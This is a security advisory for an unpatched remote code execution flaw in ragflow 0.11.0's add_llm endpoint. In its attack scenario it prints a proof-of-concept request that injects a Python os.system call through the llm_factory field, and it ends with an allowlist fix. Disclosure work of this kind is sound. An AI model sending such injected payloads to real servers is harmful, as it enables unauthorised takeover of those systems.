Severity: High

ragflow

RCE via /add_llm Endpoint

A remote code execution (RCE) vulnerability was discovered in the `add_llm` function of `llm_app.py` in ragflow version 0.11.0. The vulnerability allows attackers to execute arbitrary code via crafted user-supplied input. At the time of writing, the issue has not been patched.

Publicly disclosed on Jan 16, 2025

Threat Overview

The `add_llm` function in `llm_app.py` is vulnerable to remote code execution due to improper handling of user-supplied input. Specifically, the function uses values from the `req` dictionary to dynamically instantiate classes from several model dictionaries without input validation or sanitization. An attacker can therefore supply input that is executed as arbitrary code, leading to full compromise of the server.

Attack Scenario

An attacker crafts a malicious payload and sends it to the `/v1/llm/add_llm` endpoint. By setting the `llm_factory` parameter to a string that imports the `os` module and executes a system command, the attacker can run arbitrary commands on the server. For example, a payload whose command sleeps for 30 seconds gives a clear timing signal that arbitrary code was executed.
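The shape of such a request body can be sketched as follows. The endpoint path and the `llm_factory` expression come from the description above; the other fields (`llm_name`, `api_key`) are assumptions about what the endpoint expects, not confirmed parameter names.

```python
import json

# Hypothetical proof-of-concept body: llm_factory carries a Python
# expression that shells out to `sleep 30` if evaluated server-side.
payload = {
    "llm_factory": "__import__('os').system('sleep 30')",
    "llm_name": "demo",   # assumed field name
    "api_key": "x",       # assumed field name
}
body = json.dumps(payload)
# POSTing `body` to /v1/llm/add_llm on a vulnerable instance would make
# the response stall for ~30 seconds, confirming code execution.
```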

Who is affected

Users and administrators of the Ragflow API server running version 0.11.0 are affected by this vulnerability. Any application or service relying on this API endpoint is at risk.
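Since no patch is available, operators who cannot take the endpoint offline could reduce exposure by validating `llm_factory` against a fixed allowlist before any dynamic lookup. A minimal defensive sketch, with illustrative factory names that are not ragflow's actual registry keys:

```python
# Illustrative allowlist; a real deployment should mirror exactly the
# factory names its model registry supports.
SUPPORTED_FACTORIES = {"OpenAI", "Ollama"}

def resolve_factory(name: str, registry: dict):
    """Return a registered model class only for explicitly allowed names."""
    if name not in SUPPORTED_FACTORIES:
        raise ValueError(f"unsupported llm_factory: {name!r}")
    return registry[name]
```

With this check in place, a crafted `llm_factory` expression is rejected before it can reach any dynamic instantiation step.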
